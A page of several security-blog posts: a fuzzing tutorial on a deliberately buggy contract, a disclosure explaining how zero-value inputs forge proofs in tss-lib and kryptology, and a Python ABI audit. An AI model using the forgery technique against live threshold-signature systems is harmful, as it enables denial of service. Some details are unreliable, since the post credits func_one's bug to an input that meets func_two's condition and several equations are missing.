Hybrid fuzzing: Sharpening the spikes of Echidna

By Tom Malcolm, University of Queensland, Australia

Smart contract fuzzing is an effective bug-finding technique that is largely used at Trail Of Bits during audits. During my internship at Trail of Bits, I contributed to expand our fuzzing capabilities by working on Hybrid Echidna, a “hybrid fuzzer” that couples our smart contract fuzzer, Echidna, with our symbolic execution framework, Maat, to improve the process of finding bugs. While Echidna is a great tool, it still struggles to discover some bugs. With Hybrid Echidna, we enhance the process to find even more!

Echidna is a property-based fuzzer built by Trail of Bits that is widely used in smart contract bug hunting. (See its README for a list of notable uses of Echidna and some of the vulnerabilities it has found.) It lies in the category of “smart fuzzers,” which use the ABI of a contract and perform static analysis of its source code to make decisions on how best to generate input data.

In this post, we’ll look at an example of a contract with bugs that can be triggered only with very specific 256-bit integer inputs (e.g. 0xee250cacdb8de774585208b1e85445fca3bd09da95683133ed06742b71ec2434). We will first show how Echidna, which uses random fuzzing techniques, struggles to discover the bugs. We’ll then examine how Hybrid Echidna improves upon traditional random fuzzing and see the results for ourselves!

The problem

The following contract contains two bugs (represented as assertion failures). Triggering the bugs requires finding inputs that consist in specific 256-bit integers, which are not hardcoded into the contract’s code. The chance of randomly finding the right input is 1/115792089237316195423570985008687907853269984665640564039457584007913129639936 — which means that the bugs that are impossible to find by relying on random fuzzing only.

pragma solidity ^0.7.1;
 
contract VulnerableContract {
 
   function func_one(int128 x) public pure {
       if (x / 4 == -20) {
           assert(false); // BUG
       }
   }
 
   function func_two(int128 x) public pure {
       if ((x >> 30) / 7 == 2) {
           assert(false); // BUG
       }
   }
}

When we run Echidna on the contract (by executing the command echidna VulnerableContract.sol --test-mode assertion), it locally saves certain information about its findings. A summary is displayed in the friendly ncurses-esque interface that it greets us with, as shown below:

Although Echidna identified three “interesting” inputs and added them to the fuzzing corpus, none of them resulted in an assertion failure (i.e., a bug). In other words, Echidna failed to trigger the bugs in the contract.

What happened is that Echidna couldn’t find inputs that would meet the conditions required to trigger the buggy execution paths. This is understandable, as the bug conditions are arithmetic equations, and Echidna can only be so smart when it comes to solving such equations. Looking at the coverage files generated by Echidna, we can clearly see the code paths that weren’t covered:

    | pragma solidity ^0.7.1;
*r  |
    | contract VulnerableContract {
    |
*   |    function func_one(int128 x) public pure {
*   |        if (x / 4 == -20) {
    |            assert(false); // BUG
    |        }
    |    }
    |
*   |    function func_two(int128 x) public pure {
*   |        if ((x >> 30) / 7 == 2) {
    |            assert(false); // BUG
    |        }
    |    }
    | }

Echidna can successfully find bugs (and has on many occasions), and at the end of the day, a bug found is a bug found. However, as this example shows, its results could be improved. How, you ask? Well, if only there were a mutation of the tool, some Frankenstein version that combined Echidna with something that could sharpen its ability, forming one super bug-finder—something like a Hybrid Echidna.

Hybrid Echidna to the rescue

Note: If you’d like to follow along here, install the Optik suite of tools by running the following command:

pip install optik-tools

Hybrid Echidna is part of Optik, a new suite of tools for analysis of Ethereum smart contracts. Optik is intended to comprise both standalone tools and tools that improve upon existing ones (typically fuzzers) for dynamically analyzing smart contracts. So far, its sole tool is Hybrid Echidna, which improves upon Echidna by coupling it with Maat, a symbolic execution framework also developed in-house by Trail of Bits. At the beginning of the summer, the Hybrid Echidna codebase was a minimal one that simply ran Echidna. Now, Hybrid Echidna is a complete tool (albeit one still under development) that consistently improves upon Echidna.

How does it work?

At a high level, Hybrid Echidna simply runs Echidna multiple times, interweaving those runs with symbolic analysis to generate new fuzzing inputs. A more in-depthprocess for fuzzing a contract now looks like this:

  1. Execute an initial run of Echidna to collect a fuzzing corpus.
  2. For every unique input that is found, symbolically execute the contract with that input and record its coverage.
  3. Review the coverage information for any missed paths.
  4. Use Maat to solve inputs for those paths, and record any new inputs that would lead to the execution of a missed path.
  5. Repeat the process until there are no more inputs that can be found.

So Hybrid Echidna takes the data that Echidna finds, uses Maat to figure out how to change its input to reach difficult paths, and then fuzzes the program again (with the newfound inputs) until it can’t improve upon the findings. Think of Echidna as a contestant on Who Wants to Be a Millionaire?: when Echidna needs a hand, it can “phone a friend” in Maat (and make an unlimited number of calls).

Show me!

Let’s revisit the contract we looked at earlier—the one with two bugs that Echidna overlooked—and see how Hybrid Echidna fares.

We use the following command to run Hybrid Echidna:

hybrid-echidna VulnerableContract.sol --test-mode assertion --corpus-dir hybrid_echidna_output --contract VulnerableContract

Upon running Hybrid Echidna, we are greeted with another friendly UI that provides insight into its performance. This includes timing information and the following key takeaways:

  • Hybrid Echidna found seven unique inputs (five through fuzzing and two through symbolic execution).
  • Two of those inputs resulted in assertion failures (i.e., bugs).
  • The assertion failures occurred in the func_one and func_two functions

We can quickly verify the inputs that triggered these failures (which are shown in the “Results” section). Take Hybrid Echidna’s input to func_one, 15032385536, and recall that a result of 2 indicates an assertion failure:

$ python -c 'print((15032385536 >> 30) // 7)'
2

As we can see, Hybrid Echidna found random input that meets the very specific condition in func_one, improving upon Echidna’s performance. In other words, it found more bugs!

What’s next?

Despite its current limitations (such as its lack of support for symbolic keccak operations and its inability to account for gas usage), we are already seeing promising results with Hybrid Echidna. These results reinforce our confidence in our approach to fuzzing and make us hopeful that we’ll have even more exciting results to share in the future.

Optik is still under active development. Going forward, we plan to improve the project’s symbolic executor and, more importantly, increase Hybrid Echidna’s scalability by testing it on real-world codebases. Our end goal is for every engineer at Trail of Bits to use Hybrid Echidna when auditing smart contracts.

Try installing Optik and testing out Hybrid Echidna on the VulnerableContract.sol example (or on your own contracts), and let us know what you think!

Specialized Zero-Knowledge Proof failures

By Opal Wright

Zero-knowledge (ZK) proofs are useful cryptographic tools that have seen an explosion of interest in recent years, largely due to their applications to cryptocurrency. The fundamental idea of a ZK proof is that a person with a secret piece of information (a cryptographic key, for instance) can prove something about the secret without revealing the secret itself. Cryptocurrencies are using ZK proofs for all sorts of fun things right now, including anonymity, transaction privacy, and “roll-up” systems that help increase the efficiency of blockchains by using ZK proofs to batch transactions together. ZK proofs are also being used in more general ways, such as allowing security researchers to prove that they know how to exploit a software bug without revealing information about the bug.

As with most things in cryptography, though, it’s hard to get everything right. This blog post is all about a pair of bugs in some special-purpose ZKP code that allow ne’er-do-wells to trick some popular software into accepting invalid proofs of impossible statements. That includes “proving” the validity of invalid inputs to a group signature. This, in turn, can lead to invalid signatures. In blockchain systems that use threshold signatures, like ThorChain and Binance, this could allow an attacker to prevent targeted transactions from completing, creating a denial-of-service attack– against the chain as a whole or against specific participants.

Background on discrete log proofs

One specialized ZK proof is a discrete logarithm proof of knowledge. Suppose Bob provides Alice with an RSA modulus N = PQ, where P and Q are very large primes known only to Bob, and Bob wants to prove to Alice that he knows a secret exponent x such that s ≡ tx (mod N). That is, x is the discrete logarithm of s with respect to base t, and he wants to prove that he knows x without revealing anything about it.

The protocol works as follows:

  • First, Bob and Alice agree on a security parameter k, which is a positive integer that determines how many iterations of the protocol to perform. In practice, this is usually set to k = 128.
  • Second, Bob randomly samples ai from ZΦ(N) for i=1,2,…,k, computes corresponding values αi = tai (mod N), and sends α1,α2,…,αk to Alice.
  • Third, Alice responds with a sequence of random bits c1,c2,…,ck.
  • Fourth, Bob computes zi = ai + cix and sends z1,z2,…,zk to Alice.
  • Finally, Alice checks that tzi ≡ αisci (mod N) for all i = 1,2,…,k. If all the checks pass, she accepts the proof and is confident that Bob really knows x. Otherwise, she rejects the proof—Bob may be cheating!

Why it works

Suppose Bob doesn’t know x. For each i, Bob has two ways to attempt to fool Alice: one if he thinks Alice will pick ci = 0, and one if he thinks Alice will pick ci = 1.

If Bob guesses that Alice will select ci = 0, he can select a random ai ∈ ZN and send Alice αi = tai mod N. If Alice selects ci = 0, Bob sends Alice zi = ai, and Alice sees that tzi ≡ tai ≡ αis0 ≡ αi (mod N) and accepts the i-th iteration of the proof. On the other hand, if Alice selects ci = 1, Bob needs to compute zi such that tzi ≡ tais (mod N). That is, he needs to find the discrete logarithm of tais, which is equal to ai + x. However, Bob doesn’t know x, so he can’t compute a zi that will pass Alice’s check.

On the other hand, if Bob guesses that Alice will select ci = 1, he can select a random ai ∈ ZN and send Alice αi = tais−1 (mod N). If Alice selects ci = 1, Bob sends Alice zi = ai. Alice sees that tzi ≡ tai and tai≡ αis ≡ tαis−1s ≡ tai (mod N), and accepts the i-th iteration of the proof. But if Alice selects ci = 0, Bob needs to compute zi such that tzi ≡ tais−1 (mod N), which would be zi = ai − x. But again, since Bob doesn’t know x, he can’t compute a zi that will pass Alice’s check.

The trick is, each of Bob’s guesses only has a 50 percent chance of being right. If any one of Bob’s k guesses for Alice’s ci values are wrong, Alice will reject the proof as invalid. If Alice is choosing her ci values randomly, that means Bob’s chances of fooling Alice are about 1 in 2k.

Typically, Alice and Bob will use parameters like k = 128. Bob has a better chance of hitting the Powerball jackpot four times in a row than he does of guessing all c1,c2,…,c128 correctly.

In the case of a non-interactive proof, as we’ll see in the code below, we don’t rely on Alice to pick the values ci. Instead, Bob and Alice each compute a hash of all the values relevant to the proof: c = Hash(N ∥ s ∥ t ∥ α1 ∥ … ∥ αk). The bits of c are used as the ci values. This is called the Fiat-Shamir transform. It’s certainly possible to get the Fiat-Shamir transform wrong, with some pretty nasty consequences, but the bugs discussed in this article will not involve Fiat-Shamir failures.

The code

Our proof structure and verification code come from tss-lib, written by the folks at Binance. We came across this code while reviewing other software, and the Binance folks were super responsive when we flagged this issue for them.

To start with, we have our Proof structure:

type (
    Proof struct {
        Alpha,
        T [Iterations]*big.Int
    }
)

This is a fairly straightforward structure. We have two arrays of large integers, Alpha and T. These correspond, respectively, to the αi and zi values in the mathematical description above. It’s notable that the Proof structure does not incorporate the modulus N or the values s and t.

func (p *Proof) Verify(h1, h2, N *big.Int) bool {
    if p == nil {
        return false
    }
    modN := common.ModInt(N)
    msg := append([]*big.Int{h1, h2, N}, p.Alpha[:]...)
    c := common.SHA512_256i(msg...)
    cIBI := new(big.Int)
    for i := 0; i < Iterations; i++ {
        if p.Alpha[i] == nil || p.T[i] == nil {
            return false
        }
        cI := c.Bit(i)
        cIBI = cIBI.SetInt64(int64(cI))
        h1ExpTi := modN.Exp(h1, p.T[i])
        h2ExpCi := modN.Exp(h2, cIBI)
        alphaIMulH2ExpCi := modN.Mul(p.Alpha[i], h2ExpCi)
        if h1ExpTi.Cmp(alphaIMulH2ExpCi) != 0 {
            return false
        }
    }
    return true
}

This code actually implements the verification algorithm. The arguments h1 and h2 correspond to t and s, respectively. First, it computes the challenge value c. Then, for each bit ci of c, it computes:

If h1ExpTi ≠ alphaIMulH2ExpCi for any 0 < i ≤ k, the proof is rejected. Otherwise, it is accepted.

The issue

The thing to notice is that the Verify function doesn’t do any sort of check to validate h1, h2, or any of the elements of p.Alpha or p.T. A lack of validity checks means we can trigger all sorts of fun edge cases. In particular, when it comes to logarithms and exponential relationships, it’s important to look out for zero. Recall that, for any x ≠ 0, we have 0x = 0. Additionally, for any x, we have 0 ∙ x = 0. We are going to exploit these facts to force the equality check h1ExpTi = alphaIMulH2ExpCi to always pass.

The first impossible thing: Base-0 Discrete Logs

Suppose Bob creates a Proof structure p with the following values:

  • All elements of p.T are positive (that is, zi > 0 for all i)
  • All elements of p.Alpha are set to 0 (that is, αi = 0 for all i)

Now consider a call to the Verify function with the following parameters:

  • N is the product of two large primes
  • h1 set to any integer (that is, s is unconstrained)
  • h2 set to 0 (that is, t = 0)

The Verify function will check that tzi ≡ αisci (mod N). On the right hand side of the relationship, αi = 0 forces αisci= 0. On the left hand side of the equation, tzi = 0zi = 0 because zi > 0. Thus, the Verify function sees that 0 = 0, and accepts the proof as valid. Recall that the proof is meant to demonstrate that Bob knows the discrete log of s with respect to t. In this case, the Verifier routine will believe that Bob knows an integer x such that s ≡ 0x (mod N) for any s. But if s ∉ {0,1}, that’s impossible!

The fix

Preventing this problem is straightforward: validate that h2 and the elements of p.Alpha are all non-zero. As a matter of practice, it is a good idea to validate all cryptographic values provided by another party, ensuring that, for example, elliptic curve points lie on a curve and that integers fall within their appropriate intervals and satisfy any multiplicative properties. In the case of this proof, such validation would include checking that h1, h2, and p.Alpha are non-zero, relatively prime to N, and fall within the interval [1,N). It would also be a good idea to ensure that N passes some basic checks (such as a bit length check).

Proof of encryption of a discrete log

In some threshold signature protocols, one of the steps in the signature process involves proving two things simultaneously about a secret integer x that Bob knows:

  • That X = Rx, where X and R are in an order-q group G (typically, G will be the multiplicative group of integers for some modulus, or an elliptic curve group)
  • That a ciphertext c = PaillierEncN(x,r) for some randomization value r ∈ ZN and Bob’s public key N. That is, c = (N + 1)xrN (mod N2).

(Just for clarity: G is typically specified alongside a maximal-order group generator g ∈ G. It doesn’t get used directly in the protocol, but it does get integrated into a hash calculation – it doesn’t affect the proof, so don’t worry about it too much.)

Proving this consistency between the ciphertext c and the discrete logarithm of X ensures that Bob’s contribution to an elliptic curve signature is the same value he contributed at an earlier point in the protocol. This prevents Bob from contributing bogus X values that lead to invalid signatures.

As part of the key generation, a set of “proof parameters” are generated, including a semiprime modulus Ñ (whose factorization is unknown to Alice and Bob), as well as h1 and h2, both coprime to Ñ.

Bob begins by selecting uniform random values α←$Zq3,β←$Z*N,γ←$Zq and ρ←$Zq.

Bob then computes:

Finally, Bob computes a Fiat-Shamir challenge value e = Hash(N,Ñ,h1,h2,g,q,R,X,c,u,z,v,w) and the challenge response values:

Note that s1 and s2 are computed not modulo any value, but over the integers. Bob then sends Alice the proof πPDL=[z,e,s,s1,s2].

Alice, upon receiving πPDL, first checks that s1 ≤ q3; if this check fails, she rejects the proof as invalid. She then computes:

Finally, Alice computes:

If e ≠ ê, she rejects <πPDL as invalid. Otherwise, she accepts πPDL as valid.

Why it works

First, let’s make sure that a valid proof will validate:

Because u (with a hat), v (with a hat) and w (with a hat), match u, v, and w (respectively), we will have ê, = e, and the proof will validate.

To understand how Bob is prevented from cheating, read this paper and section 6 of this paper.

The code

The following code is taken from the kryptology library’s Paillier discrete log proof implementation. Specifically, the following code is used to compute v (with a hat):


func (p PdlProof) vHatConstruct(pv *PdlVerifyParams) (*big.Int, error) {
    // 5. \hat{v} = s^N . (N + 1)^s_1 . c^-e mod N^2

    // s^N . (N + 1)^s_1 mod N^2
    pedersenInc, err := inc(p.s1, p.s, pv.Pk.N)
    if err != nil {
        return nil, err
    }

    cInv, err := crypto.Inv(pv.C, pv.Pk.N2)
    if err != nil {
        return nil, err
    }
    cInvToE := new(big.Int).Exp(cInv, p.e, pv.Pk.N2)
    vHat, err := crypto.Mul(pedersenInc, cInvToE, pv.Pk.N2)
    if err != nil {
        return nil, err
    }
    return vHat, nil
}

The calling function, Verify, uses vHatConstruct to compute the v (with a hat) value described above. In a valid proof, everything should work out just fine.

The issue

In an invalid proof, things do not work out just fine. In particular, it is possible for Bob to set v = s = 0 . When this happens, the value of c is irrelevant: Alice winds up checking that v (with a hat) = 0N ∙ (N+1)s1 ∙ c−e = 0 = v</e,>, and accepts the result.

The second impossible thing: Arbitrary Ciphertexts

By exploiting the v (with a hat) = s = 0 issue, Bob can prove that he knows x such that X = Rx, but simultaneously “prove” to Alice that any value for c ≠ 0 is a valid ciphertext for x. Bob doesn’t even need to know the factorization of N. Once again, Bob has “proved” the impossible!

This forgery has real security implications. In particular, being able to forge this proof allows Bob to sabotage the threshold signature protocol without being detected. In some systems, this could be used to prevent valid transactions from being performed.

It is worth noting: the specific case of c = 0 will be detected as an error. The line cInv, err := crypto.Inv(pv.C, pv.Pk.N2) attempts to invert c modulo N2. When c = 0, this function will return an error, causing the vHatConstruct function to return an error in turn.

The fix

Again, this can be prevented by better input validation. Basic validation of the proof would involve checking that z and s are in Z*N. That is, checking that gcd(z,N) = gcd(s,N) = 1, which forces z0 and s0. Additionally, there should be checks to ensure s1 ≠ 0 and s2 ≠ 0.

Risks and disclosure

The risk

These bugs were found in repositories that implement the GG20 threshold signature scheme. If attackers exploit the ciphertext malleability bug, they can “prove” the validity of invalid inputs to a group signature, leading to invalid signatures. If a particular blockchain relies on threshold signatures, this could allow an attacker to prevent targeted transactions from completing.

Disclosure

We have reported the issues with tss-lib to Binance, who promptly fixed them. We have also reached out to numerous projects that rely on tss-lib (or, more commonly, forks of tss-lib). This includes ThorChain, who have also fixed the code; Joltify and SwipeChain rely directly on the ThorChain fork. Additionally, Keep Networks maintains their own fork of tss-lib; they have integrated fixes.

The issue with kryptology has been reported to Coinbase. The kryptology project on GitHub has since been archived. We were not able to identify any current projects that rely on the library’s threshold signature implementation.

The moral of the story

In the end, this is a cryptographic failure stemming from a completely understandable data validation oversight. Values provided by another party should always be checked against all applicable constraints before being used. Heck, values computed from values provided by another party should always be checked against all applicable constraints.

But if you look at mathematical descriptions of these ZK proofs, or even well-written pseudocode, where are these constraints spelled out? These documents describe the algorithms mathematically, not concretely. You see steps such as β←$Z*N, followed later by v = (N + 1)αβN (mod N2). From a mathematical standpoint, it’s understood that v is in Z*N2, and thus v ≠ 0. From a programming standpoint, though, there’s no explicit indication that there’s a constraint to check on v.

Trail of Bits maintains a resource guide for ZK proof systems at zkdocs.com. These types of issues are one of our primary motivations for such guidance—translating mathematical and theoretical descriptions into software is a difficult process. Admittedly, some of our own descriptions could explain these checks more clearly; we’re hoping to have that fixed in an upcoming release.

One piece of guidance that Trail of Bits likes to give auditors and cryptographers is to look out for two special values: 0 and 1 (as well as their analogues, like the point at infinity). Bugs related to 0 or its analogues have caused problems in the past (for instance, here and here). In this case, a failure to check for 0 leads to two separate bugs that allow attackers in a threshold signature scheme to lead honest parties down a rabbit hole.

ABI compatibility in Python: How hard could it be?

TL;DR: Trail of Bits has developed abi3audit, a new Python tool for checking Python packages for CPython application binary interface (ABI) violations. We’ve used it to discover hundreds of inconsistently and incorrectly tagged package distributions, each of which is a potential source of crashes and exploitable memory corruption due to undetected ABI differences. It’s publicly available under a permissive open source license, so you can use it today!

Python is one of the most popular programming languages, with a correspondingly large package ecosystem: over 600,000 programmers use PyPI to distribute over 400,000 unique packages, powering much of the world’s software.

The age of Python’s packaging ecosystem also sets it apart: among general-purpose languages, it is predated only by Perl’s CPAN. This, combined with the mostly independent development of packaging tooling and standards, has made Python’s ecosystem among the more complex of the major programming language ecosystems. Those complexities include:

  • Two major current packaging formats (source distributions and wheels), as well as a smattering of domain-specific and legacy formats (zipapps, Python Eggs, conda’s own format, &c.);

  • A constellation of different packaging tools and package specification files: setuptools, flit, poetry, and PDM, as well as pip, pipx, and pipenv for actually installing packages;

  • …and a corresponding constellation of package and dependency specification files: pyproject.toml (PEP 518-style), pyproject.toml (Poetry-style), setup.py, setup.cfg, Pipfile, requirements.txt, MANIFEST.in, and so forth.

This post will cover just one tiny piece of Python packaging’s complexity: the CPython stable ABI. We’ll see what the stable ABI is, why it exists, how it’s integrated into Python packaging, and how each piece goes terribly wrong to make accidental ABI violations easy.

The CPython stable API and ABI

Not unlike many other reference implementations, Python’s reference implementation (CPython) is written in C and provides two mechanisms for native interaction:

  • A C Application Programming Interface (API), allowing C and C++ programmers to compile against CPython’s public headers and use any exposed functionality;

  • An Application Binary Interface (ABI), allowing any language with C ABI support (like Rust or Golang) to link against CPython’s runtime and use the same internals

Developers can use the CPython API and ABI to write CPython extensions. These extensions behave exactly like ordinary Python modules but interact directly with the interpreter’s implementation details rather than the “high-level” objects and APIs exposed in Python itself.

CPython extensions are a cornerstone of the Python ecosystem: they provide an “escape hatch” for performance-critical tasks in Python, as well as enable code reuse from native languages (like the broader C, C++, and Rust packaging ecosystems).

At the same time, extensions pose a problem: CPython’s APIs change between releases (as the implementation details of CPython change), meaning that it is unsound, by default, to load a CPython extension into an interpreter of a different version. The implications of this unsoundness vary: a user might get lucky and have no problems at all, might experience crashes due to missing functions or, worst of all, experience memory corruption due to changes in function signatures and structure layouts.

To ameliorate the situation, CPython’s developers created the stable API and ABI: a set of macros, types, functions, and data objects that are guaranteed to remain available and forward-compatible between minor releases. In other words: a CPython extension built for CPython 3.7’s stable API will also load and function correctly on CPython 3.8 and forwards, but is not guaranteed to load and function with CPython 3.6 or earlier.

At the ABI level, this compatibility is referred to as “abi3”, and is optionally tagged in the extension’s filename: mymod.abi3.so, for example, designates a loadable stable-ABI-compatible CPython extension module named mymod. Critically, the Python interpreter does not do anything with this tag — it’s simply ignored.

This is the first strike: CPython has no notion of whether an extension is actually stable-ABI-compatible. We’ll now see how this compounds with the state of Python packaging to produce even more problems.

CPython extensions and packaging

On its own, a CPython extension is just a bare Python module. To be useful to others, it needs to be packaged and distributed like all other modules.

With source distributions, packaging a CPython extension is straightforward (for some definitions of straightforward): the source distribution’s build system (generally setup.py) describes the compilation steps needed to produce the native extension, and the package installer runs these steps during installation.

For example, here’s how we define microx’s native extension (microx_core) using setuptools:

Distributing a CPython extension via source distribution has advantages (✅) and disadvantages (❌):

    ✅API and ABI stability are non-issues: the package either builds during installation or it doesn’t and, when it does build, it runs against the same interpreter that it built against.

    ✅Source builds are burdensome for users: they require end-users of Python software to install the CPython development headers, as well as maintain a native toolchain corresponding to the language or ecosystem that the extension targets. That means requiring a C/C++ (and increasingly, Rust) toolchain on every deployment machine, adding size and complexity.

    ❌Source builds are fundamentally fragile: compilers and native dependencies are in constant flux, leaving end users (who are Python experts at best, not compiled language experts) to debug compiler and linker errors.

The Python packaging ecosystem’s solution to these problems is wheels. Wheels are a binary distribution format, which means that they can (but are not required to) provide pre-compiled binary extensions and other shared objects that can be installed as-is, without custom build steps. This is where ABI compatibility is absolutely essential: binary wheels are loaded blindly by the CPython interpreter, so any mismatch between the actual and expected interpreter ABIs can cause crashes (or worse, exploitable memory corruption).

Because wheels can contain pre-compiled extensions, they need to be tagged for the version(s) of Python that they support. This tagging is done with PEP 425-style “compatibility” tags: microx-1.4.1-cp37-cp37m-macosx_10_15_x86_64.whl designates a wheel that was built for CPython 3.7 on macOS 10.15 for x86-64, meaning that other Python versions, host OSes, and architectures should not attempt to install it.

On its own, this limitation makes wheel packaging for CPython extensions a bit of a hassle:

    ❌In order to support all valid combinations of {Python Version, Host OS, Host Architecture}, the packager must build a valid wheel for each. This means additional test, build, and distribution complexity, as well as exponential CI growth as a package’s support matrix expands.

    ❌Because wheels are (by default) tied to a single Python version, packagers are required to generate a new set of wheels on each Python minor version change. In other words: new Python versions start out without access to a significant chunk of the packaging ecosystem until packagers can play catch up.

This is where the stable ABI becomes critical: instead of building one wheel per Python, version packagers can build an “abi3” wheel for the lowest supported Python version. This comes with the guarantee that the wheel will work on all future (minor) releases, solving both the build matrix size problem and the ecosystem bootstrapping problem above.

Building an “abi3” wheel is a two-step process: the wheel is built locally (usually using the same build system as the source distribution) and then retagged with abi3 as the ABI tag rather than a single Python version (like cp37 for CPython 3.7).

Critically: neither of these steps is validated, because Python’s build tools have no good way to validate them. This leaves us with the second and third strikes:

  • To correctly build a wheel against the stable API and ABI, the build needs to set the Py_LIMITED_API macro to the intended CPython support version (or, for Rust with PyO3, to use the correct build feature). This prevents Python’s C headers from using non-stable functionality or potentially inlining incompatible implementation details.

For example, to build a wheel as cp37-abi3 (stable ABI for CPython 3.7+), the extension needs to either #define Py_LIMITED_API 0x03070000 in its own source code, or use the setuptools.Extension construct’s define_macros argument to configure it. These are easy to forget, and produce no warning when forgotten!

Additionally, when using setuptools, the packager may choose to set py_limited_api=True. But this does not enable any actual API restrictions; it merely adds the .abi3 tag to the built extension’s filename. As you’ll recall this is not currently checked by the CPython interpreter, so this is effectively a no-op.

Critically, it does not affect the actual wheel build. The wheel is built however the underlying setuptools.Extension sees fit: it might be completely right, it might be a little wrong (stable ABI, but for the wrong CPython version), or it might be completely wrong.

This breakdown happens because of the devolved nature of Python packaging: the code that builds extensions is in pypa/setuptools, while the code that builds wheels is in pypa/wheel — two completely separate codebases. Extension building is designed as a black box, a fact that Rust and other language ecosystems take advantage of (there is no Py_LIMITED_API macro to sensibly define in a PyO3-based extension — it’s all handled separately by build features).

To summarize:

  • Stable ABI (“abi3”) wheels are the only reliable way to package native extensions without a massive build matrix.

  • However, none of the dials that control abi3-compatible wheel building talk to each other: it’s possibly to build an abi3-compatible wheel without tagging it as such, or to build a non-abi3 wheel and tag it incorrectly as compatible, or to tag an abi3-compatible wheel as compatible with the wrong CPython version.

  • Consequently, the correctness of the current abi3-compatible wheel ecosystem is suspect. ABI violations are capable of causing crashes and even exploitable memory corruption, so we need to quantify the current state of affairs.

How bad is it, really?

This all seems pretty bad, but it’s just an abstract problem: it’s entirely possible that every Python packager gets their wheel builds right, and hasn’t published any incorrectly tagged (or completely invalid) abi3-style wheels.

To get a sense for how bad things really are, we developed abi3audit. Abi3audit’s entire raison d’être is finding these kinds of ABI violation bugs: it scans individual extensions, Python wheels (which can contain multiple extensions), and entire package histories, reporting back anything that doesn’t match the specified stable ABI version or is entirely incompatible with the stable ABI.

To get a list of auditable packages to feed into abi3audit, I used PyPI’s public BigQuery dataset to generate a list of every abi3-wheel-containing package downloaded from PyPI in the last 21 days:

#standardSQL
SELECT DISTINCT file.project
FROM `bigquery-public-data.pypi.file_downloads`
WHERE file.filename LIKE '%abi3%'
  -- Only query the last 21 days of history
  AND DATE(timestamp)
    BETWEEN DATE_SUB(CURRENT_DATE(), INTERVAL 21 DAY)
    AND CURRENT_DATE()

( I chose 21 because I blew through my BigQuery quota while testing. It’d be interesting to see the full list of downloads over a year or the entire history of PyPI, although I’d expect diminishing returns.)

From that query, I got 357 packages, which I’ve uploaded as a GitHub Gist. With those packages saved, a JSON report from abi3audit was only a single invocation away:

The JSON from that audit is also available as a GitHub Gist.

First, some high-level statistics:

  • Of the 357 initial packages queried from PyPI, 339 actually contained auditable wheels. Some were 404s (presumably created and then deleted), while others were tagged with abi3 but did not actually contain any CPython extension modules (which does, technically, make them abi3 compatible!). A handful of these were ctypes-style modules, with either a vendored library or code to load a library that the host was expected to contain.

  • Those 339 remaining packages had a total of 13650 abi3-tagged wheels between them. The largest (in terms of wheels) was eclipse-zenoh-nightly, with 1596 wheels (or nearly 12 percent of all abi3-tagged wheels on PyPI).

  • The 13650 abi3-tagged wheels had a total of 39544 shared objects, each a potential Python extension, between them. In other words: the average abi3-tagged wheel has 2.9 shared objects in it, each of which was audited by abi3audit.

    • Attempting to parse each shared object in each abi3-tagged wheel produced all kinds of curious results: plenty of wheels contained invalid shared objects: ELF files that began with garbage (but contained a valid ELF later in the file), temporary build artifacts that weren’t cleaned up, and a handful of wheels that appeared to contain editor-style swap files for hand-modified binaries. Unfortunately, unlike Moyix, we did not discover any catgirls.

Now, the juicy parts:

Of the 357 valid packages, 54 (15 percent) contained wheels with ABI version violations. In other words: roughly one in six packages had wheels that claimed support for a particular Python version, but actually used the ABI of a newer Python version.

More severely: of those same 357 valid packages, 11 (3.1 percent) contained outright ABI violations. In other words: roughly one in thirty packages had wheels that claimed to be stable ABI compatible, but weren’t at all!

In total, 1139 (roughly 3 percent) Python extensions had version violations, and 90 (roughly 0.02 percent) had outright ABI violations. This suggests two things: that the same packages tend to have ABI violations across multiple wheels and extensions, and that multiple extensions within the same wheel tend to have ABI violations at the same time (which makes sense, since they should share the same build).

Here are some that we found particularly interesting:

PyQt6 and sip

PyQt6 and sip are both part of the Qt project, and both had ABI version violations: multiple wheels were tagged for CPython 3.6 (cp36-abi3), but used APIs that were only stabilized with CPython 3.7.

sip additionally had a handful of wheels with outright ABI violations, all from the internal _Py_DECREF API:

refl1d

refl1d is a NIST-developed reflectometry package. They did a couple of releases tagged for the stable ABI of Python 3.2 (the absolute lowest), while actually targeting the stable ABI of Python 3.11 (the absolute highest — not even released yet!).

hdbcli

hdbcli appears to be a proprietary client for SAP HANA, published by SAP themselves. It’s tagged as abi3, which is cool! Unfortunately, it isn’t actually abi3-compatible:

This, again, suggests building without the correct macros. We’d be able to figure out more with the source code, but this package appears to be completely proprietary.

gdp and pifacecam

These are two smaller packages, but they piqued my interest because both had stable ABI violations that weren’t just the reference/counting helper APIs:

dockerfile

Finally, I liked this one because it turns out to be a Python extension written in Go, not C, C++, or Rust!

The maintainer had the right idea, but didn’t define Py_LIMITED_API to any particular value. So Python’s headers “helpfully” interpreted that as not limited at all:

The path forward

First, the silver lining: most of the extremely popular packages in the list had no ABI violations or version mismatches. Cryptography and bcrypt were spared, for example, indicating strong build controls on their side. Other relatively popular packages had version violations, but they were generally minor (for example: expecting a function that was only stabilized with 3.7, but has been present and the same since 3.3).

Overall, however, these results are not great: they indicate (1) that a significant portion of the “abi3” wheels on PyPI aren’t really abi3-compatible at all (or are compatible with a different version than they claim), and (2) that maintainers don’t fully understand the different knobs that control abi3 tagging (and that those knobs do not actually modify the build itself).

More generally, the results point to a need for better controls, better documentation, and better interoperation between Python’s different packaging components. In nearly all cases, the package’s maintainer has attempted to do the right thing, but seemingly wasn’t aware of the additional steps necessary to actually build an abi3-compatible wheel. In addition to improving the package-side tooling here, the auditing is also automatable: we’ve designed abi3audit in part to demonstrate that it would be possible for PyPI to catch these kinds of wheel errors before they become a part of the public index.

We’re streamers now

Over the years, we’ve built many high-impact tools that we use for security reviews. You might know some of them, like Slither, Echidna, Amarna, Tealer, and test-fuzz. All of our tools are open source, and we love seeing the community benefit from them. But mastering our tools takes time and practice, and it’s easier if someone can guide you. To that end, we create several tutorials (see building-secure-contracts) and frequently host training sessions at conferences. Now we’re going one step further: we’re live-streaming workshops on Twitch and YouTube.

During our streams, Trail of Bits engineers will describe each of our tools in depth, giving users an inside look at the underlying technology and how they can use the tools in their own work. We will focus on providing hands-on experience, with real-world exercises, and answer common questions about the tools.

First up: 6-part series on fuzzing smart contracts

We’ll share detailed technical presentations on fuzzing smart contracts, and guide attendees to write invariants for them in our first six workshops. Engineers will go over fuzzer setup, how to identify invariants—from simple to complex—and how to translate these invariants into code.

The workshops will be held on the following dates:

Building secure contracts: Learn how to fuzz like a pro

  • Wednesday, November 16 (12pm ET): Introduction to fuzzing (Anish Naik)
  • Tuesday, November 22: Fuzzing arithmetics (Anish Naik)
